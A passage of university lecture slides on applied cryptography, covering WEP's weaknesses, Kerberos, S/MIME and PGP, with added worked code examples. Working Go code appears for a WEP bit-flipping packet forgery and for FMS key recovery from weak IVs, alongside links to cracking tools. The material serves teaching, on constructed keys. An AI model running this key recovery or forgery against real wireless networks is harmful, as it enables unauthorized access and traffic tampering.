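// CRC(X^Y) = CRC(X)^CRC(Y) holds for a raw CRC; the CRC-32 WEP uses has an
// initial value and final complement, so CRC(X^Y) = CRC(X)^CRC(Y)^CRC(0^len).
// affineFix applies that extra term.
func flipBits(body, delta []byte, affineFix bool) []byte {
	n := len(body) - 4
	icvDelta := crc32.ChecksumIEEE(delta)
	if affineFix {
		icvDelta ^= crc32.ChecksumIEEE(make([]byte, n))
	}
	full := append(append([]byte{}, delta...), le32(icvDelta)...)
	out := make([]byte, len(body))
	for i := range body {
		out[i] = body[i] ^ full[i]
	}
	return out
}

// RedirectDemo wraps a minimal constructed IPv4 header in a WEP frame, rewrites
// its destination from 10.0.0.1 to 10.0.0.99 in the ciphertext, and reports
// the destination and ICV result the receiver sees.
func RedirectDemo(affineFix bool) (dst string, icvOK bool) {
	K := []byte{0x1F, 0x2A, 0x3B, 0x4C, 0x5D} // 40-bit key, constructed
	iv := []byte{0x01, 0x02, 0x03}
	hdr := make([]byte, 20)
	hdr[0] = 0x45 // IPv4, IHL 5; other fields left zero for brevity
	copy(hdr[12:16], net.IPv4(10, 0, 0, 2).To4())
	copy(hdr[16:20], net.IPv4(10, 0, 0, 1).To4())
	body := wepEncrypt(K, iv, hdr)

	// The attacker only needs old XOR new for the bytes she changes.
	old, want := net.IPv4(10, 0, 0, 1).To4(), net.IPv4(10, 0, 0, 99).To4()
	delta := make([]byte, len(hdr))
	for i := 0; i < 4; i++ {
		delta[16+i] = old[i] ^ want[i]
	}
	forged := flipBits(body, delta, affineFix)

	plain, ok := wepDecrypt(K, iv, forged)
	return net.IP(plain[16:20]).String(), ok
}

func main() {
	fmt.Println(RedirectDemo(true))  // 10.0.0.99 true
	fmt.Println(RedirectDemo(false)) // 10.0.0.99 false: ICV wrong without the CRC(0) term
}
```

A real IP header also carries its own checksum, which the attacker must compensate as well (possible, since she knows the old and new address); the slide's point stands: nothing in WEP's integrity check stops an attacker from changing a packet she cannot read.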

SLIDE 78

#3 Statistical Cryptanalysis

Fluhrer, Mantin, and Shamir (FMS), 2001, only two years after WEP was published. Some IVs are weak, i.e. they allow guessing some internal states of the cipher, leading to the key.

The IV and the first byte of plaintext/ciphertext must be known: the IV is sent in the clear, the ciphertext is eavesdropped, and the first bytes of ARP or TCP frames are fixed or easily guessed.

About 4 million IVs to recover a 128-bit key (marketed as 128-bit: 104 secret bits plus the 24-bit IV). The number of IVs needed is linear in the key length (instead of exponential). The key is revealed byte after byte (sequentially).

SLIDE 79

#3 Statistical Cryptanalysis

Korek, 2004: proposed 17 attacks based on FMS, with new classes of weak IVs. About 1 million IVs; 2 bytes of plaintext must be observable.

Tews, Weinmann, Pyshkin (PTW), 2007: still new classes; about 80,000 IVs; more bytes must be observable. Variant by Vaudenay/Vuagnoux (32,000 IVs). Key bytes are no longer necessarily guessed sequentially.

SLIDE 80

WEP Cryptanalytic Attack

WEP data is encrypted using RC4. The packet key is the IV and the long-term key K: the 3-byte IV is prepended to K, so the packet key is (IV, K).

The IV is sent in the clear (not secret). A new IV is sent with every packet; the long-term key K never changes.

Assume Trudy (the attacker) knows the IVs and the ciphertext, and can guess the first bytes of the plaintext. Trudy wants to find the key K.

SLIDE 81

WEP Cryptanalytic Attack

The 3-byte IV is prepended to the key. We denote the RC4 key bytes K0, K1, K2, K3, K4, K5, ..., where IV = (K0, K1, K2), which Trudy knows. Trudy wants to find K3, K4, K5, ...

Attack due to Fluhrer, Mantin, and Shamir: Trudy watches IVs until she sees a 3-byte IV of the form IV = (K0, K1, K2) = (3, 255, X), where X can be anything. Then the RC4 key for this packet is (3, 255, X, K3, K4, K5, ...).

SLIDE 82

RC4 Steps

KSA (Key-Scheduling Algorithm): initialization, then scrambling.
PRGA (Pseudo-Random Generation Algorithm).

SLIDE 83

WEP Cryptanalysis

KSA pseudo-code (N = 256):

Initialization: for i = 0 to N-1: S[i] = i
Scrambling: j = 0; for i = 0 to N-1: j = (j + S[i] + K[i mod keylen]) mod N; swap(S[i], S[j])

Key bytes for a packet with IV (3, 255, X):

i     0    1     2    3    4    ...
K_i   3    255   X    K3   K4   ...

The first four scrambling steps:

i = 0: j = 0 + S[0] + K0 = 0 + 0 + 3 = 3
i = 1: j = 3 + S[1] + K1 = 3 + 1 + 255 = 259 = 3 (mod N)
i = 2: j = 3 + S[2] + K2 = 3 + 2 + X = 5 + X
i = 3: j = (5 + X) + S[3] + K3 = (5 + X) + 1 + K3 = 6 + X + K3

State S after each step (only the positions that change are shown):

step    S[0]  S[1]  S[2]   S[3]      S[4]  ...  S[5+X]  ...  S[6+X+K3]
init    0     1     2      3         4     ...  5+X     ...  6+X+K3
i = 0   3     1     2      0         4     ...  5+X     ...  6+X+K3
i = 1   3     0     2      1         4     ...  5+X     ...  6+X+K3
i = 2   3     0     5+X    1         4     ...  2       ...  6+X+K3
i = 3   3     0     5+X    6+X+K3    4     ...  2       ...  1

SLIDE 84

WEP Cryptanalytic Attack

Assumption for the table layout: 6 + X + K3 > 5 + X (mod N); otherwise the column 6+X+K3 would sit to the left of 5+X.

Up to now, we have only considered the first 4 steps of the scrambling, i = 0, 1, 2, 3. In reality there are 256 steps.

For now, assume that the scrambling stops after i = 3. The PRGA then outputs:

PRGA (init i = j = 0):
i = (i + 1) mod N = 1
j = (j + S[i]) mod N = S[1] = 0
swap(S[i], S[j]) = swap(S[1], S[0])
output S[(S[i] + S[j]) mod N] = S[3] = 6 + X + K3

SLIDE 85

WEP Cryptanalytic Attack

Note: keystreamByte = 6 + X + K3. If keystreamByte is known, we can solve for K3, since K3 = (keystreamByte − 6 − X) mod N.

But the scrambling does not stop at i = 3. So can this "attack" really work?

If the elements at positions 0, 1 and 3 are not swapped during the remaining scrambling steps, the attack works; this happens with probability about (1 − 3/N)^(N−3) ≈ 5%.

SLIDE 86

WEP Cryptanalytic Attack

Can Trudy really recover the key? If she sees enough IVs (each one votes for a value of K3, and the right value wins), she gets K3.

Suppose Trudy has found K3. How does she find K4? Consider IVs of the form IV = (4, 255, X). After scrambling step i = 4, one can show that keystreamByte = S[4] = 10 + X + K3 + K4. And so on for K5, K6, ...

SLIDE 87

Attack Summary in Practice

Client/IP discovery phase. Flooding (injecting traffic to obtain many IVs quickly). Sniffing IVs and keystreams. Key cracking.
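The attack derived on the preceding slides, as an added example in Go (not from the slides). It implements the RC4 KSA and PRGA, generates the weak-IV traffic (t, 255, X) for every key byte t, and applies the FMS "resolved condition" (S[1] < t and S[1] + S[S[1]] = t after t simulated KSA steps) to vote on each key byte; for t = 3 the vote reduces to the slide's K3 = keystreamByte − 6 − X. The 40-bit key is constructed, the first plaintext byte is assumed known (the 0xAA SNAP header), and the top-three candidate ranking with a final verification is my addition, modelled on the "fudge factor" of the cracking tools; all function names are mine.

```go
package main

import "fmt"

const N = 256

// ksa runs the RC4 key scheduling for the first `steps` steps (N for the
// full KSA). With steps = t the attacker reproduces exactly the part of
// the KSA she knows from the IV and the key bytes recovered so far.
func ksa(key []byte, steps int) (S [N]byte, j byte) {
	for i := 0; i < N; i++ {
		S[i] = byte(i)
	}
	for i := 0; i < steps; i++ {
		j += S[i] + key[i%len(key)]
		S[i], S[j] = S[j], S[i]
	}
	return
}

// firstKeystreamByte: one PRGA step (i=1, j=S[1], swap, output S[S[i]+S[j]]).
func firstKeystreamByte(packetKey []byte) byte {
	S, _ := ksa(packetKey, N)
	i, j := byte(1), S[1]
	S[i], S[j] = S[j], S[i]
	return S[S[i]+S[j]]
}

// packet is what the attacker keeps per frame: the clear IV and the first
// keystream byte z = C[0] XOR P[0], with P[0] the known 0xAA SNAP header.
type packet struct {
	iv [3]byte
	z  byte
}

// capture constructs the weak-IV traffic the attacker waits for: IVs of the
// form (t, 255, X) for every X and every key byte index t.
func capture(K []byte) []packet {
	var pk []packet
	for t := 3; t < 3+len(K); t++ {
		for x := 0; x < N; x++ {
			iv := [3]byte{byte(t), 255, byte(x)}
			pk = append(pk, packet{iv, firstKeystreamByte(append(iv[:], K...))})
		}
	}
	return pk
}

// voteForByte: simulate the t known KSA steps; if S[1] < t and
// S[1]+S[S[1]] == t (resolved), the first output equals S[j_t] with
// probability ~5%, where j_t = j + S[t] + K[t], so K[t] = S^-1[z] - j - S[t].
func voteForByte(pk []packet, known []byte, t int) [N]int {
	var votes [N]int
	for _, p := range pk {
		if int(p.iv[0]) != t {
			continue
		}
		S, j := ksa(append(p.iv[:], known...), t)
		if int(S[1]) >= t || int(S[1])+int(S[S[1]]) != t {
			continue
		}
		var inv [N]byte
		for idx, v := range S {
			inv[v] = byte(idx)
		}
		votes[inv[p.z]-j-S[t]]++
	}
	return votes
}

// topCandidates ranks the three most voted values for one key byte.
func topCandidates(v [N]int) []byte {
	var used [N]bool
	out := make([]byte, 3)
	for n := range out {
		best := -1
		for c := 0; c < N; c++ {
			if !used[c] && (best < 0 || v[c] > v[best]) {
				best = c
			}
		}
		used[best], out[n] = true, byte(best)
	}
	return out
}

// RecoverKey recovers the key byte by byte, trying ranked candidates
// depth-first and validating a complete key against four captured packets.
func RecoverKey(pk []packet, keyLen int) []byte {
	var search func(known []byte) []byte
	search = func(known []byte) []byte {
		if len(known) == keyLen {
			for _, p := range pk[:4] {
				if firstKeystreamByte(append(p.iv[:], known...)) != p.z {
					return nil
				}
			}
			return known
		}
		for _, c := range topCandidates(voteForByte(pk, known, 3+len(known))) {
			if k := search(append(append([]byte{}, known...), c)); k != nil {
				return k
			}
		}
		return nil
	}
	return search(nil)
}

func main() {
	K := []byte{0x1F, 0x2A, 0x3B, 0x4C, 0x5D} // 40-bit WEP key, constructed
	pk := capture(K)
	fmt.Printf("%d weak-IV packets, recovered %x (true %x)\n", len(pk), RecoverKey(pk, len(K)), K)
}
```

With the 256 weak IVs of each class the correct byte collects roughly 5% of the votes while wrong values collect about one each; ranking and verifying candidate keys makes the recovery robust to the occasional miscount. Real traffic yields one IV of this class per 65,536 packets on average, which is why the original attack needed millions of frames.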

SLIDE 88

Downloadable Tools

AirCrack-ng: http://www.aircrack-ng.org. Implements Korek and PTW (needs ARP flooding). Available e.g. in BackTrack.

WepCrack: http://sourceforge.net/projects/wepcrack/. "WEPCrack is a tool that cracks 802.11 WEP encryption keys using the latest discovered weakness of RC4 key scheduling." Last version: October 2004.

AirSnort: http://airsnort.shmoo.com/. Last update: 2005. Implements Korek's attacks.

SLIDE 89

Kerberos

SLIDE 90

Many-to-Many Authentication

How do users prove their identities when requesting services from servers on the network?

Naive solution: every server knows every user's password.

Insecure: breaking into one server may compromise all users.
Inefficient: passwords must be changed on every server.
Not convenient: passwords must be typed for each request.

(Figure: users on one side, servers on the other.)

SLIDE 91

Server-Aided Authentication

(Figure: users, a trusted third party, servers.)

1. The user proves his identity and requests a credential.
2. The trusted third party provides a credential to the user.
3. The credential is supplied to the server to get the expected service.

The credential, aka ticket, is an identity proof but does not necessarily give the ability to use a given service (authorization is a separate decision).

SLIDE 92

Server-Aided Authentication

Hypotheses: there is an online (trusted) authentication server (AS). The AS shares KC with the client C and KS with the server S.

Goal: to help C and S share a session key K.

SLIDE 93

Very Weak Example

(Figure: identity of the client, identity of the server. Source of the picture: Vaudenay's lecture notes, EPFL, 2005.)

Flaw: the client can give the server's key to other clients.

SLIDE 94

Weak Example

An attacker can replace Ic by IA.

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

A solution consists in not revealing the server’s key: the AS itself encrypts the session key K with the server’s key (a “sealed envelope”).

SLIDE 95

Still Weak Example

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

Replay attack by impersonating the AS if K is compromised (due to careless users): there is no means to be sure that K is fresh.

SLIDE 96

Needham-Schroeder (1978)

Source of the picture: Vaudenay’s lecture notes, EPFL, 2005

Replay attack by impersonating C if K is compromised (due to careless users): there is no means to be sure that K is fresh.

SLIDE 97

Kerberos V

The name Kerberos comes from Greek mythology: it is the three-headed dog that guarded the entrance of Hades.

Created at MIT, free of charge.

Kerberos 4 (1988), obsolete. Kerberos 5 (1993), RFC 1510, then RFC 4120 (2005).

Deployed: initially on Unix systems; used in many commercial products, e.g. Windows from 2000 on.

Based on symmetric-key cryptography.

SLIDE 98

Kerberos V

Once you have logged into a workstation and been authenticated, you can access remote resources without typing your username and password again.

The Kerberos software on the workstation completes the authentication automatically on your behalf.

SLIDE 99

Kerberos Elements

Client C.
Authentication server AS, a.k.a. KDC (key distribution center).
Ticket granting server TGS.
Server S which the client wants to access.

1- Request a Ticket Granting Ticket
2- Provide a Ticket Granting Ticket
3- Request a Ticket for a given service
4- Provide a Ticket for a given service
5- Forward the Ticket
6- Provide a service

SLIDE 100

Tickets

To access a service, the client must have a ticket for that service.

The user can get this ticket from the Ticket Granting Server (TGS).

The service ticket confirms that the user can access the service.

The Ticket Granting Ticket (TGT) only confirms the identity of the user.

The client shows a ticket + an authenticator.

SLIDE 101

Tickets, Authenticators

The ticket contains:

Ic: the client’s identity.
v: validity period.
Kc,s: symmetric session key to be used between the client and the server.
Others: flags, IP address, etc.

It is encrypted with the key of the server Ks. The authenticator is just the client’s identity and a timestamp encrypted with the session key.

SLIDE 102

Between C and AS

To start, the user must authenticate at the AS to have access to the TGS.

C sends his name and the name of the TGS he wants to access to the AS.

The AS replies with a Ticket Granting Ticket encrypted with the TGS’s key and a session key encrypted with C’s key.

(1) Ic, Itgs, N
(2) {Itgs,N,Kc,tgs}Kc, {Ic,v,Kc,tgs}Ktgs

SLIDE 103

User & Service Authentication

The user types his username and password on his machine.

The client applies a one-way function (in practice a hash function) to the password in order to get the cryptographic key Kc.

Servers’ keys are random bit-strings.

SLIDE 104

Between C and TGS

The client sends the ticket as well as an authenticator to the TGS.

The ticket contains the session key Kc,tgs.

The TGS uses the session key to verify the authenticator.

The TGS knows whether C is authorized to access the server S.

The TGS delivers a ticket to access the service.

(3) Is,N’,{Ic,v,Kc,tgs}Ktgs, {Ic,t}Kc,tgs
(4) {Is,N’,Kc,s}Kc,tgs, {Ic,v,Kc,s}Ks

SLIDE 105

Between C and S

The service ticket again contains the client’s identity, his IP address, a validity period and the session key to be used between the client and server.

The client has also received a copy of the session key, encrypted with the previous session key.

He sends an authenticator and the ticket to the server.

(5) {Ic,v,Kc,s}Ks, {Ic,t}Kc,s
(6) {t+1}Kc,s
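The six messages of the preceding slides, run end to end, as an added example that is not Kerberos code and not part of the original slides. The symmetric encryption is a constructed stand-in (SHA-256 keystream plus an HMAC tag) for the real encryption types, the key and identity names follow the slides, and the server-side timestamp check on the authenticator is what rejects a replay.

```python
import hashlib, hmac, json, os

# Constructed stand-in for Kerberos' symmetric encryption (SHA-256 keystream XOR
# plus an HMAC tag); real Kerberos uses AES/3DES encryption types, not this.
def _keystream(key, nonce, n):
    return b"".join(hashlib.sha256(key + nonce + bytes([i])).digest()
                    for i in range((n + 31) // 32))[:n]
def seal(key, obj):
    nonce, pt = os.urandom(16), json.dumps(obj, sort_keys=True).encode()
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()
def unseal(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("does not decrypt under this key")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

LIFETIME, SKEW = 8 * 3600, 300   # ticket validity (8 h as on the slide), clock-skew tolerance
def kc_from_password(pw): return hashlib.sha256(pw.encode()).digest()   # one-way function
# Keys known to the AS: Kc derived from the password, random bit-strings for the servers.
KEYS = {"alice": kc_from_password("correct horse"), "tgs": os.urandom(32), "s": os.urandom(32)}

def issue(ic, iserver, n, k_prev, now):
    """AS (2) and TGS (4): returns {Iserver,N,K}K_prev and the ticket {Ic,v,K}K_server."""
    k = os.urandom(32).hex()
    return (seal(k_prev, {"I": iserver, "N": n, "K": k}),
            seal(KEYS[iserver], {"Ic": ic, "v": now + LIFETIME, "K": k}))

def verify(iserver, ticket, authenticator, now):
    """TGS (3) / S (5): open the ticket with the server key, then the authenticator with K."""
    t = unseal(KEYS[iserver], ticket)
    if now > t["v"]:
        raise ValueError("ticket expired")
    a = unseal(bytes.fromhex(t["K"]), authenticator)
    if a["Ic"] != t["Ic"] or abs(now - a["t"]) > SKEW:   # timestamp = the anti-replay check
        raise ValueError("authenticator rejected: identity mismatch or stale timestamp")
    return t["Ic"], bytes.fromhex(t["K"]), a["t"]

def client_open(k_prev, enc, n):
    r = unseal(k_prev, enc)
    if r["N"] != n:                  # the nonce binds the reply to this request
        raise ValueError("reply is not fresh")
    return bytes.fromhex(r["K"])

def run(now, password="correct horse"):
    """Client 'alice' walks steps (1)-(6); returns the service ticket, Kc,s and the authenticator."""
    kc, n1 = kc_from_password(password), os.urandom(8).hex()
    enc, tgt = issue("alice", "tgs", n1, KEYS["alice"], now)      # (1) -> (2) at the AS
    kc_tgs = client_open(kc, enc, n1)                             # fails on a wrong password
    ic, k_tgs, _ = verify("tgs", tgt, seal(kc_tgs, {"Ic": "alice", "t": now}), now)   # (3)
    n2 = os.urandom(8).hex()
    enc2, st = issue(ic, "s", n2, k_tgs, now)                     # (4)
    kc_s = client_open(kc_tgs, enc2, n2)
    auth = seal(kc_s, {"Ic": "alice", "t": now})
    _, k_s, t = verify("s", st, auth, now)                        # (5)
    assert unseal(kc_s, seal(k_s, {"t1": t + 1}))["t1"] == now + 1   # (6) {t+1}Kc,s: S proves Kc,s
    return st, kc_s, auth
```

Presenting the same ticket and authenticator again an hour later fails at the timestamp check, which is the freshness guarantee the "still weak" protocols above lacked.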

SLIDE 106

Discussion

It is the client's responsibility to store his authentication data (the tickets); the servers are stateless.

The authentication server is accessed only once during the ticket validity (typically 8 hours).

Clients can access services with their tickets even if the authentication server is down.

Once a client is authenticated, his ticket cannot be revoked.

SLIDE 107

Ski Pass Analogy

The developers of Kerberos propose an analogy between Kerberos and a ski package.

You get a three-day ski pass (TGT) from your travel agency against a proof of identity (and money…).

Then, the three-day ski pass (TGT) can be used at four different resorts. You show the pass at whichever resort you decide to go to (until it expires), and you receive a lift ticket (ST) for that resort.

Once you have the lift ticket (ST), you can ski all you want at that resort (until it expires).

If you go to another resort later, you once again show the three-day ski pass (TGT), and you get another lift ticket (ST) for the new resort.

SLIDE 108

S/MIME

SLIDE 109

Certificates

S/MIME: hierarchical. Users trust a certification authority.

PGP: peer-to-peer. Users trust some other users. One or several identities (names, e-mail addresses). One or several signatures per identity.

SLIDE 110

Mime

Mime (Multipurpose Internet Mail Extensions) is a standard used to represent any object in e-mails or other electronic documents (e.g. HTTP replies).

A Mime document contains at least the following two headers: Mime-version, Content-type.

Content types: text/plain, text/html, image/gif, video/mpeg, multipart/mixed, etc.

SLIDE 111

S/Mime Basics

S/Mime was proposed by RSA Security in 1997; S/Mime is now owned by the IETF.

S/Mime adds digital signatures and encryption to Mime messages.

S/Mime exclusively uses X.509 certificates, signed by a certification authority (chain of trust).

Thus, before using S/Mime we have to obtain a certificate from a CA.

SLIDE 112

S/MIME: Principles

Received: from smtp4.sgsi.ucl.ac.be ([10.1.5.4]) by mmp.sipr-dc.ucl.ac.be for gildas.avoine@uclouvain.be; Wed, 30 Apr 2008 01:04:21 +0200 (CEST)
Received: from [192.168.1.2] (45.66-136-217.adsl-dyn.isp.belgacom.be [217.136.66.45]) by smtp4.sgsi.ucl.ac.be (Postfix) with ESMTP for <gildas.avoine@uclouvain.be>; Wed, 30 Apr 2008 01:04:29 +0200 (CEST)
Date: Wed, 30 Apr 2008 01:04:14 +0200
From: avoine <gildas.avoine@uclouvain.be>
Subject: test
To: gildas.avoine@uclouvain.be
Message-id: <4817A96E.2030101@uclouvain.be>
MIME-version: 1.0
Content-type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary=------------ms070301020000070200060202
User-Agent: Thunderbird 2.0.0.12 (Windows/20080213)

This is a cryptographically signed message in MIME format.

-------------ms070301020000070200060202
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Hello World!
SLIDE 113

S/MIME: Principles

Hello World!
-------------ms070301020000070200060202
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIICezC
AncwggHgoAMCAQICBQCJgWDNMA0GCSqGSIb3DQEBBQUAMCkxFDASBgNVBAoTC1NlbGYtU2ln
(…)
hvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw
BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEgYBqlFmpWmAD1er41TC6
xECUG508seotHJZphg4ueJqfegikYos7gkBLm93hHFOr70gkuvLbqNtMX4ro0I2Jd2iIdfrY
03jDIZFKVt5vg1+LGKv/3ZfX1T6kv9+nJU7M8epOcYdP+IJjr6JgyqVGMW95WDyA0sKMOuA2
/2unjqrgHgAAAAAAAA==
-------------ms070301020000070200060202--
SLIDE 114

S/MIME: Principles

Hybrid encryption.

What does this mean?

One recipient. Several recipients.

SLIDE 115

PGP

Basics. Public-Key Validity. Key Distribution. Key Revocation.

SLIDE 116

PGP History 1/

PGP = Pretty Good Privacy. Several flavors: PGP, PGPi, GPG.

PGP: published by Philip Zimmermann in 1991. Portable software initially containing classical algorithms: MD5, IDEA, RSA.

First software allowing anybody to completely protect their documents and messages.

3 years of enquiry and harassment by the American government: patented algorithms (RSA patented in the US until 2000); suspicion of violating export regulations.

SLIDE 117

PGP History 2/

1997:

Sale of PGP Inc. to McAfee (Network Associates). Code no longer public.

During the 39th IETF meeting in Munich, Zimmermann and Callas requested the IETF to set up a working group on the standardization of PGP (OpenPGP [RFC1991, Aug 96], [RFC2440, Nov 98], [RFC4880, Nov 07]).

Richard Stallman, at the Individual-Network Betriebstagung in Aachen, requested the European hackers to implement public-key software (US citizens were not allowed to do so outside the US).

2001:

Zimmermann leaves Network Associates. Network Associates abandons PGP.

SLIDE 118

PGP History 3/

2002:

PGP Corporation is created, buys back the PGP rights. Code is again public. Free vs Trial download: basic functionalities remain available after 30 days, but not the additional functionalities, e.g. disk encryption.

Complete system compliant with OpenPGP.

www.pgp.com Current version: 9.8

SLIDE 119

PGP History 4/

PGPi

Developed by Ståle S. Ytteborg (Norway) to counter the US export regulations.

Maintained from 1997 to 2000. Obtained from the printed source code of PGP: MIT Press thus published a book with the PGP source code.

www.pgpi.org

SLIDE 120

PGP History 5/

GPG

GPG = GnuPG = GNU Privacy Guard. GnuPG is the GNU GPL version of PGP. Initially, it used Elgamal and Blowfish instead of RSA and IDEA.

Follows the OpenPGP standard. Version 0.0.0 released in December 1997. Initially called G10. www.gnupg.org Current version: 2.0. GUI frontends: http://www.gnupg.org/related_software/frontends.en.html

Das Briefgeheimnis sowie das Post- und Fernmeldegeheimnis sind unverletzlich. Grundgesetz, Artikel 10, Abs 1. Secrecy of letters as well as sanctity of mail, telephone and telegraph are inviolable. Basic Law, Article 10, Paragraph 1.

SLIDE 121

PGP Specialties

Encryption / Signature. Key management.

What is called a PGP key is actually a PGP certificate. Web of trust.

SLIDE 122

Signed Message Example

SLIDE 123

Symmetric Encryption [RFC4880]

TDES [Mandatory]: slow; considered to be secure.

IDEA: still patented until 2010. Seems to be secure: resisted all cryptanalysis for 17 years…

CAST5 (128-bit key) [should impl. CAST5]: less studied than the other algorithms.

Blowfish (128-bit key): less studied than the other algorithms.

Twofish (256-bit key) (AES contest top-5 finalist): rather new.

AES (128/192/256-bit key) [should impl. AES128]: THE standard since 2000.

All of them seem to be secure.

SLIDE 124

Public-Key [RFC4880]

Encryption: RSA, Elgamal [Mandatory] (randomized encryption).

Signature: RSA, DSA [Mandatory]. Elgamal is no longer recommended for signature: attack by Phong Nguyen (2003) when Elgamal keys are used for both encryption and signature. The flaw was exploitable for 4 years…

SLIDE 125

Hash Functions [RFC4880]

MD5: deprecated.

SHA-1 [Mandatory]: its use should be avoided.

SHA-224/256/384/512: seem OK.

RIPEMD-160: seems OK.

Tiger: seems OK.

SLIDE 126

Protection of the Private Key

The private key cannot be memorized by the user. How can we protect our private key?

It is stored on the hard disk, encrypted with a key derived from a password (no means to access it without the user’s collaboration). The password is hashed to generate a symmetric key. Once decrypted, the private key is in the computer’s memory (dangerous).

It may be stored on a smart card. Access to the card is protected by a password. The key never leaves the card; it is the data that transits through the card to get encrypted, decrypted or signed.

The passphrase must be as strong as the key (i.e., at least the same entropy).

SLIDE 127

Key Size [Lenstra,Verheul, 01]

public key (bits)   symmetric key (bits)
1024                71
1536                80
2048                87
3072                99

What should be the minimum passphrase length (in chars) to protect a 1024-bit RSA private key?

SLIDE 128

Public Key Validity

How to be sure that the key we use to encrypt a message is the correct one?

Directory: who put the key into the directory? Fake identity associated with the key? Is the directory a legitimate one?

Face to face: check the ID, check the hash of the key, sign the key (why?).

Certificates.

SLIDE 129

Validity and Trust in PGP

Two important notions in PGP.

Validity: I know that this key belongs to Bob. Trust: I know that Bob does not sign keys arbitrarily.

When we sign a key, we declare its validity.

SLIDE 130

Validity and Trust in PGP

We can also declare a full or partial trust. A key is valid if the sum of the partial trusts of its valid signatures is at least 1.
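The validity rule above, applied to a constructed keyring, as an added example that is neither PGP's nor GnuPG's code. The weights are an assumption: a fully trusted signer counts 1 and a partially trusted signer 0.5, so one full or two partial signatures reach the threshold of 1; a signature only counts once the signer's own key is valid, which is why the set is grown to a fixed point.

```python
# Assumed weights (not taken from the slides): full trust = 1, partial trust = 0.5.
TRUST_WEIGHT = {"full": 1.0, "partial": 0.5, "none": 0.0}

def compute_validity(signatures, trust, own_keys, threshold=1.0):
    """signatures: {key: set of keys that signed it}; trust: {key: 'full'|'partial'|'none'};
    own_keys: keys the user verified directly (valid by definition).
    A signature only counts if the signer's key is itself valid, so the valid set is
    grown until nothing changes (a fixed point)."""
    valid = set(own_keys)
    changed = True
    while changed:
        changed = False
        for key, signers in signatures.items():
            if key in valid:
                continue
            score = sum(TRUST_WEIGHT[trust.get(s, "none")] for s in signers if s in valid)
            if score >= threshold:
                valid.add(key)
                changed = True
    return valid

# Constructed sample keyring: Alice's own key is the only axiom; she fully trusts Bob
# and partially trusts Carol, Dave and Ivan. Validity and trust are separate notions:
# Erin's key becomes valid, but her signatures carry no weight since Alice does not trust her.
SIGNATURES = {
    "bob": {"alice"}, "carol": {"alice"},   # signed by Alice (full): valid
    "dave": {"carol"},                      # one partial signer: 0.5 < 1, not valid
    "erin": {"bob"},                        # one full signer: valid
    "frank": {"carol", "dave"},             # Dave's key is not valid, so only Carol counts
    "grace": {"carol", "erin"},             # Erin is valid but not trusted: 0.5 only
    "hank": {"carol", "ivan"},              # two partial signers, but Ivan is validated later
    "ivan": {"alice"},
}
TRUST = {"alice": "full", "bob": "full", "carol": "partial", "dave": "partial", "ivan": "partial"}

def example():
    return compute_validity(SIGNATURES, TRUST, own_keys={"alice"})
```

Hank's key is only accepted on the second pass, after Ivan's key has become valid; Frank's and Grace's never reach the threshold.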

SLIDE 131

Key Publication

Several PGP key servers exist across the world.

http://pgp.mit.edu/

They contain all keys of all PGP users that want to publish their key.

If Alice is sure that the key associated with Clara belongs to Clara, she can sign Clara’s key and re-submit it to the servers.

If Eddy trusts Alice, he can accept Clara’s key.

SLIDE 132

Key Revocation

How can we revoke a key published on a server? Servers are replicated: withdrawing a key is useless because another server will duplicate it again.

How can we prove that we are allowed to revoke a key if we lost it?

We generate a key revocation certificate when we generate the key. The confidentiality of this certificate is not a major issue.

We set a validity deadline on the key when we generate it.

SLIDE 133

Cryptographic Key Summary

Which keys are involved when Alice sends an encrypted/signed message to Bob?

SLIDE 134

Conclusion

SLIDE 135

Conclusion

Symmetric-key crypto or public-key crypto. One key / one service. Avoid using the key directly.

Session key (forward secrecy).

Key generation (who, how, e.g. issues in PRNGs). Key distribution. Identify the trusted parties. Revocation of the public keys.

More generally, think about how to react to an attack.

Check the weak link (cf. PGP).